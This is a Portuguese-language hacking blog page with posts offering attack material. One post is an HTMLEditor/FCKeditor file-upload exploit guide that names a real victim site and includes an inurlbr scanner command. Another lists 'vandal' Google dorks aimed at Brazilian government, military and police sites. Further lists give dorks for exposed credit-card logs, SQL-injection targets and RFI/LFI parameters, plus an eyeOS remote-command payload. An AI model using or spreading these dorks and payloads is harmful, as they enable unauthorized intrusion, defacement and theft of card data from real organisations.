Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador strings. Mostrar todas as postagens
Mostrando postagens com marcador strings. Mostrar todas as postagens

segunda-feira, 15 de setembro de 2014

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


sexta-feira, 11 de outubro de 2013

Dorks de vândalo

Dorks de vândalo


DORK'S: 


site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"

quinta-feira, 26 de janeiro de 2012

sábado, 26 de fevereiro de 2011

BANCO DE STRINGS


Banco de Strings SQL ERROS
Conjunto de Strings Que expõe erros SQL em determinados sites.
OBS:BOM PARA SQL INJECTION.

Banco de Strings Busca MÚSICAS

Conjunto de Strings Que expõe diretórios / pastas / com arquivos de mídia.

Banco de Strings Busca PASSWORD
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de senhas ou privilégios de edição.
 

Banco de Strings Busca CÂMERAS  &  WEB-CAN
Conjunto de Strings Que expõe Câmeras de vigilância & Web-Can's.



Dorks variadas

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=

    ASP DORK
    nurl:”add.asp?bookid=”
    inurl:”add_cart.asp?num=”
    inurl:”addcart.asp?”
    inurl:”addItem.asp”
    inurl:”add-to-cart.asp?ID=”
    inurl:”addToCart.asp?idProduct=”
    inurl:”addtomylist.asp?ProdId=”
    inurl:”adminEditProductFields.asp?intProdID=”
    inurl:”advSearch_h.asp?idCategory=”
    inurl:”affiliate.asp?ID=”
    inurl:”affiliate-agreement.cfm?storeid=”
    inurl:”affiliates.asp?id=”
    inurl:”ancillary.asp?ID=”
    inurl:”archive.asp?id=”
    inurl:”article.asp?id=”
    inurl:”aspx?PageID”
    inurl:”basket.asp?id=”
    inurl:”Book.asp?bookID=”
    inurl:”book_list.asp?bookid=”
    inurl:”book_view.asp?bookid=”
    inurl:”BookDetails.asp?ID=”
    inurl:”browse.asp?catid=”
    inurl:”browse_item_details.asp”
    inurl:”Browse_Item_Details.asp?Store_Id=”
    inurl:”buy.asp?”
    inurl:”buy.asp?bookid=”
    inurl:”bycategory.asp?id=”
    inurl:”cardinfo.asp?card=”
    inurl:”cart.asp?action=”
    inurl:”cart.asp?cart_id=”
    inurl:”cart.asp?id=”
    inurl:”cart_additem.asp?id=”
    inurl:”cart_validate.asp?id=”
    inurl:”cartadd.asp?id=”
    inurl:”cat.asp?iCat=”
    inurl:”catalog.asp”
    inurl:”catalog.asp?CatalogID=”
    inurl:”catalog_item.asp?ID=”
    inurl:”catalog_main.asp?catid=”
    inurl:”category.asp”
    inurl:”category.asp?catid=”
    inurl:”category_list.asp?id=”
    inurl:”categorydisplay.asp?catid=”
    inurl:”checkout.asp?cartid=”
    inurl:”checkout.asp?UserID=”
    inurl:”checkout_confirmed.asp?order_id=”
    inurl:”checkout1.asp?cartid=”
    inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
    inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
    inurl:”comersus_optReviewReadExec.asp?idProduct=”
    inurl:”comersus_viewItem.asp?idProduct=”
    inurl:”comments_form.asp?ID=”
    inurl:”contact.asp?cartId=”
    inurl:”content.asp?id=”
    inurl:”customerService.asp?TextID1=”
    inurl:”default.asp?catID=”
    inurl:”description.asp?bookid=”
    inurl:”details.asp?BookID=”
    inurl:”details.asp?Press_Release_ID=”
    inurl:”details.asp?Product_ID=”
    inurl:”details.asp?Service_ID=”
    inurl:”display_item.asp?id=”
    inurl:”displayproducts.asp”
    inurl:”downloadTrial.asp?intProdID=”
    inurl:”emailproduct.asp?itemid=”
    inurl:”emailToFriend.asp?idProduct=”
    inurl:”events.asp?ID=”
    inurl:”faq.asp?cartID=”
    inurl:”faq_list.asp?id=”
    inurl:”faqs.asp?id=”
    inurl:”feedback.asp?title=”
    inurl:”freedownload.asp?bookid=”
    inurl:”fullDisplay.asp?item=”
    inurl:”getbook.asp?bookid=”
    inurl:”GetItems.asp?itemid=”
    inurl:”giftDetail.asp?id=”
    inurl:”help.asp?CartId=”
    inurl:”home.asp?id=”
    inurl:”index.asp?cart=”
    inurl:”index.asp?cartID=”
    inurl:”index.asp?ID=”
    inurl:”info.asp?ID=”
    inurl:”item.asp?eid=”
    inurl:”item.asp?item_id=”
    inurl:”item.asp?itemid=”
    inurl:”item.asp?model=”
    inurl:”item.asp?prodtype=”
    inurl:”item.asp?shopcd=”
    inurl:”item_details.asp?catid=”
    inurl:”item_list.asp?maingroup”
    inurl:”item_show.asp?code_no=”
    inurl:”itemDesc.asp?CartId=”
    inurl:”itemdetail.asp?item=”
    inurl:”itemdetails.asp?catalogid=”
    inurl:”learnmore.asp?cartID=”
    inurl:”links.asp?catid=”
    inurl:”list.asp?bookid=”
    inurl:”List.asp?CatID=”
    inurl:”listcategoriesandproducts.asp?idCategory=”
    inurl:”modline.asp?id=”
    inurl:”myaccount.asp?catid=”
    inurl:”news.asp?id=”
    inurl:”order.asp?BookID=”
    inurl:”order.asp?id=”
    inurl:”order.asp?item_ID=”
    inurl:”OrderForm.asp?Cart=”
    inurl:”page.asp?PartID=”
    inurl:”payment.asp?CartID=”
    inurl:”pdetail.asp?item_id=”
    inurl:”powersearch.asp?CartId=”
    inurl:”privacy.asp?cartID=”
    inurl:”prodbycat.asp?intCatalogID=”
    inurl:”prodetails.asp?prodid=”
    inurl:”prodlist.asp?catid=”
    inurl:”product.asp?bookID=”
    inurl:”product.asp?intProdID=”
    inurl:”product_info.asp?item_id=”
    inurl:”productDetails.asp?idProduct=”
    inurl:”productDisplay.asp”
    inurl:”productinfo.asp?item=”
    inurl:”productlist.asp?ViewType=Category&CategoryID= “
    inurl:”productpage.asp”
    inurl:”products.asp?ID=”
    inurl:”products.asp?keyword=”
    inurl:”products_category.asp?CategoryID=”
    inurl:”products_detail.asp?CategoryID=”
    inurl:”productsByCategory.asp?intCatalogID=”
    inurl:”prodView.asp?idProduct=”
    inurl:”promo.asp?id=”
    inurl:”promotion.asp?catid=”
    inurl:”pview.asp?Item=”
    inurl:”resellers.asp?idCategory=”
    inurl:”results.asp?cat=”
    inurl:”savecart.asp?CartId=”
    inurl:”search.asp?CartID=”
    inurl:”searchcat.asp?search_id=”

    inurl:”Select_Item.asp?id=”
    inurl:”Services.asp?ID=”
    inurl:”shippinginfo.asp?CartId=”
    inurl:”shop.asp?a=”
    inurl:”shop.asp?action=”
    inurl:”shop.asp?bookid=”
    inurl:”shop.asp?cartID=”
    inurl:”shop_details.asp?prodid=”
    inurl:”shopaddtocart.asp”
    inurl:”shopaddtocart.asp?catalogid=”
    inurl:”shopbasket.asp?bookid=”
    inurl:”shopbycategory.asp?catid=”
    inurl:”shopcart.asp?title=”
    inurl:”shopcreatorder.asp”
    inurl:”shopcurrency.asp?cid=”
    inurl:”shopdc.asp?bookid=”
    inurl:”shopdisplaycategories.asp”
    inurl:”shopdisplayproduct.asp?catalogid=”
    inurl:”shopdisplayproducts.asp”
    inurl:”shopexd.asp”
    inurl:”shopexd.asp?catalogid=”
    inurl:”shopping_basket.asp?cartID=”
    inurl:”shopprojectlogin.asp”
    inurl:”shopquery.asp?catalogid=”
    inurl:”shopremoveitem.asp?cartid=”
    inurl:”shopreviewadd.asp?id=”
    inurl:”shopreviewlist.asp?id=”
    inurl:”ShopSearch.asp?CategoryID=”
    inurl:”shoptellafriend.asp?id=”
    inurl:”shopthanks.asp”
    inurl:”shopwelcome.asp?title=”
    inurl:”show_item.asp?id=”
    inurl:”show_item_details.asp?item_id=”
    inurl:”showbook.asp?bookid=”
    inurl:”showStore.asp?catID=”
    inurl:”shprodde.asp?SKU=”
    inurl:”specials.asp?id=”
    inurl:”store.asp?id=”
    inurl:”store_bycat.asp?id=”
    inurl:”store_listing.asp?id=”
    inurl:”Store_ViewProducts.asp?Cat=”
    inurl:”store-details.asp?id=”
    inurl:”storefront.asp?id=”
    inurl:”storefronts.asp?title=”
    inurl:”storeitem.asp?item=”
    inurl:”StoreRedirect.asp?ID=”
    inurl:”subcategories.asp?id=”
    inurl:”tek9.asp?”
    inurl:”template.asp?Action=Item&pid=”
    inurl:”topic.asp?ID=”
    inurl:”tuangou.asp?bookid=”
    inurl:”type.asp?iType=”
    inurl:”updatebasket.asp?bookid=”
    inurl:”updates.asp?ID=”
    inurl:”view.asp?cid=”
    inurl:”view_cart.asp?title=”
    inurl:”view_detail.asp?ID=”
    inurl:”viewcart.asp?CartId=”
    inurl:”viewCart.asp?userID=”
    inurl:”viewCat_h.asp?idCategory=”
    inurl:”viewevent.asp?EventID=”
    inurl:”viewitem.asp?recor=”
    inurl:”viewPrd.asp?idcategory=”
    inurl:”ViewProduct.asp?misc=”
    inurl:”voteList.asp?item_ID=”
    inurl:”whatsnew.asp?idCategory=”
    inurl:”WsAncillary.asp?ID=”

    SQL DORK

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()
    inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=

    RFI AND LFI

    RFI
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk

    INURL OR ALLINURL WITH:

    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    6. allinurl:ihm.php?p=

    7. Keyword : “powered by AllMyLinks”
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    11. keyword : “Powered by phpBB 2.0.6?
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    12. keyword : “powered by CubeCart 3.0.6?
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    13. keyword : “powered by paBugs 2.0 Beta 3?
    /class.mysql.php?path_to_bt_dir=

    14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=

    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    16. allinurl:ihm.php?p=*

    14. keyword : “powered eyeOs”
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

    15. allinurl:.php?bodyfile=

    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    17. allinurl:forums.html
    /modules.php?name=

    18. allinurl:/default.php?page=home

    19. allinurl:/folder.php?id=

    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    25. key word : “powered by Fantastic News v2.1.2?
    /archive.php?CONFIG[script_path]=

    26. keyword: “powered by smartblog” AND inurl:?page=login
    /index.php?page=

    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    28. keyword:”Powered By FusionPHP”
    /templates/headline_temp.php?nst_inc=

    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    31. keyword : “Powered by iUser”
    /common.php?include_path=

    32. allinurl: “static.php?load=”
    /static.php?load=

    33. keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    34. keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=
    LFI

    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
